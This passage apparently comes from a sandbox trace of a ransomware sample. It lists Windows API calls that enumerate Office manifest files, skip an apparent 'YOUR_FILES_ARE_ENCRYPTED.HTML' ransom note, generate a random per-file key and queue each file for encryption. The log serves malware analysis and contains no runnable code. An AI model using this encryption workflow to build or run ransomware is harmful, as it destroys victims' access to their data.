returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml" [0155.996] CreateIoCompletionPort (FileHandle=0x594, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0155.996] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0155.997] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92e95a70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92e95a70, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77f246f0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x2656, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.dcfmui.msi.16.en-us.xml", cAlternateFileName="C206B0~1.XML")) returned 1 [0155.997] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml") returned 114 [0155.997] lstrcmpW (lpString1="C2RManifest.dcfmui.msi.16.en-us.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.000] PathFindExtensionW (pszPath="C2RManifest.dcfmui.msi.16.en-us.xml") returned=".xml" [0156.000] lstrlenW (lpString=".xml") returned 4 [0156.000] PathFindExtensionW (pszPath="C2RManifest.dcfmui.msi.16.en-us.xml") returned=".xml" [0156.007] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.007] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml" (normalized: 
"c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.dcfmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0156.008] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=9814) returned 1 [0156.008] GetProcessHeap () returned 0x270000 [0156.008] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x744a1c0 [0156.009] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="5B") returned 2 [0156.009] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="C0") returned 2 [0156.009] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="CF") returned 2 [0156.009] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="90") returned 2 [0156.009] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="B5") returned 2 [0156.009] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="E1") returned 2 [0156.009] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="6E") returned 2 [0156.009] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="FB") returned 2 [0156.009] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="73") returned 2 [0156.009] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="1B") returned 2 [0156.009] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="F4") returned 2 [0156.009] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="3D") returned 2 [0156.010] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="83") returned 2 [0156.010] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="B5") returned 2 [0156.010] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="F9") returned 2 [0156.010] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="81") 
returned 2 [0156.010] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="4F") returned 2 [0156.010] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="89") returned 2 [0156.010] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="1E") returned 2 [0156.010] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="89") returned 2 [0156.010] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="9C") returned 2 [0156.010] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="E0") returned 2 [0156.010] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="B3") returned 2 [0156.010] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="F5") returned 2 [0156.010] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="53") returned 2 [0156.010] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="AB") returned 2 [0156.010] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="84") returned 2 [0156.010] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="AC") returned 2 [0156.010] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="8F") returned 2 [0156.010] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="B9") returned 2 [0156.010] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="46") returned 2 [0156.010] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="77") returned 2 [0156.011] lstrcpyW (in: lpString1=0x745a274, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.dcfmui.msi.16.en-us.xml" [0156.011] CreateIoCompletionPort (FileHandle=0x594, 
ExistingCompletionPort=0x3a0, CompletionKey=0x744a1c0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.011] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x744a1c0, lpOverlapped=0x744a1c0) returned 1 [0156.011] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92e95a70, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92e95a70, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77363a50, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x3a132, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml", cAlternateFileName="C21578~1.XML")) returned 1 [0156.011] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml") returned 127 [0156.011] lstrcmpW (lpString1="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.011] PathFindExtensionW (pszPath="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml") returned=".xml" [0156.011] lstrlenW (lpString=".xml") returned 4 [0156.011] PathFindExtensionW (pszPath="C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml") returned=".xml" [0156.011] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.011] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excel.excel.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0156.012] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=237874) returned 1 [0156.012] GetProcessHeap () returned 0x270000 [0156.012] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7472318 [0156.016] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="24") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="E7") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="C6") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="6C") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="89") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="2B") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="EE") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="3B") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="24") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="5E") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="AB") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="13") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="43") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="FA") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="DE") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="89") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="A7") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | 
out: param_1="E3") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="F2") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="AE") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="47") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="99") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="9F") returned 2 [0156.016] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="F6") returned 2 [0156.017] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="A9") returned 2 [0156.017] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="9B") returned 2 [0156.017] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="E9") returned 2 [0156.017] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="CA") returned 2 [0156.017] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="C2") returned 2 [0156.017] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="04") returned 2 [0156.017] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="89") returned 2 [0156.017] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="7B") returned 2 [0156.017] lstrcpyW (in: lpString1=0x74823cc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml" [0156.017] CreateIoCompletionPort (FileHandle=0x590, ExistingCompletionPort=0x3a0, CompletionKey=0x7472318, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.017] 
PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7472318, lpOverlapped=0x7472318) returned 1 [0156.018] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92e6f910, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92e6f910, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77c50cd0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x88d0, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.excelmui.msi.16.en-us.xml", cAlternateFileName="C2D2CD~1.XML")) returned 1 [0156.018] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml") returned 116 [0156.018] lstrcmpW (lpString1="C2RManifest.excelmui.msi.16.en-us.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.018] PathFindExtensionW (pszPath="C2RManifest.excelmui.msi.16.en-us.xml") returned=".xml" [0156.018] lstrlenW (lpString=".xml") returned 4 [0156.018] PathFindExtensionW (pszPath="C2RManifest.excelmui.msi.16.en-us.xml") returned=".xml" [0156.018] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.018] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.excelmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0156.018] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: 
lpFileSize=0x4ebdb1c*=35024) returned 1 [0156.018] GetProcessHeap () returned 0x270000 [0156.018] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x749a470 [0156.022] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="92") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="2B") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="61") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="5A") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="CC") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="8F") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="05") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="9F") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="EB") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="6E") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="7D") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="48") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="8A") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="4A") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="55") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="0B") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="60") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="D9") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="59") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: 
param_1="D1") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="B7") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="74") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="52") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="C6") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="1E") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="DE") returned 2 [0156.022] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="48") returned 2 [0156.023] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="A5") returned 2 [0156.023] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="E0") returned 2 [0156.023] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="A2") returned 2 [0156.023] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="C8") returned 2 [0156.023] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="72") returned 2 [0156.023] lstrcpyW (in: lpString1=0x74aa524, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml" [0156.023] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x749a470, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.023] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x749a470, lpOverlapped=0x749a470) returned 1 [0156.023] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: 
lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92e6f910, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92e6f910, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x772cb4d0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x8f06, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml", cAlternateFileName="C233DB~1.XML")) returned 1 [0156.023] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml") returned 129 [0156.023] lstrcmpW (lpString1="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.023] PathFindExtensionW (pszPath="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml") returned=".xml" [0156.023] lstrlenW (lpString=".xml") returned 4 [0156.023] PathFindExtensionW (pszPath="C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml") returned=".xml" [0156.024] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.024] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groove.groove.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x59c [0156.025] GetFileSizeEx (in: hFile=0x59c, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=36614) returned 1 [0156.025] GetProcessHeap () returned 0x270000 [0156.025] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, 
Size=0x28150) returned 0x74c25c8 [0156.080] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="04") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="C1") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="C0") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="0C") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="6D") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="B4") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="96") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="DF") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="DB") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="D4") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="07") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="91") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="9C") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="1F") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="16") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="68") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="3C") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="52") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="16") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="39") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="E6") returned 2 [0156.081] wsprintfW (in: 
param_1=0x4ebda8a, param_2="%02X" | out: param_1="0E") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="2E") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="93") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="76") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="7C") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="B0") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="7E") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="64") returned 2 [0156.081] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="26") returned 2 [0156.082] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="28") returned 2 [0156.082] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="7C") returned 2 [0156.082] lstrcpyW (in: lpString1=0x74d267c, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Groove.Groove.x-none.msi.16.x-none.xml" [0156.082] CreateIoCompletionPort (FileHandle=0x59c, ExistingCompletionPort=0x3a0, CompletionKey=0x74c25c8, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.082] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c25c8, lpOverlapped=0x74c25c8) returned 1 [0156.083] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92e6f910, 
ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92e6f910, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77c9cf90, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x17f6, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.groovemui.msi.16.en-us.xml", cAlternateFileName="C26024~1.XML")) returned 1 [0156.083] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml") returned 117 [0156.083] lstrcmpW (lpString1="C2RManifest.groovemui.msi.16.en-us.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.083] PathFindExtensionW (pszPath="C2RManifest.groovemui.msi.16.en-us.xml") returned=".xml" [0156.084] lstrlenW (lpString=".xml") returned 4 [0156.084] PathFindExtensionW (pszPath="C2RManifest.groovemui.msi.16.en-us.xml") returned=".xml" [0156.085] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.085] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.groovemui.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x590 [0156.085] GetFileSizeEx (in: hFile=0x590, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=6134) returned 1 [0156.085] GetProcessHeap () returned 0x270000 [0156.085] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0156.099] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="63") returned 2 [0156.099] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | 
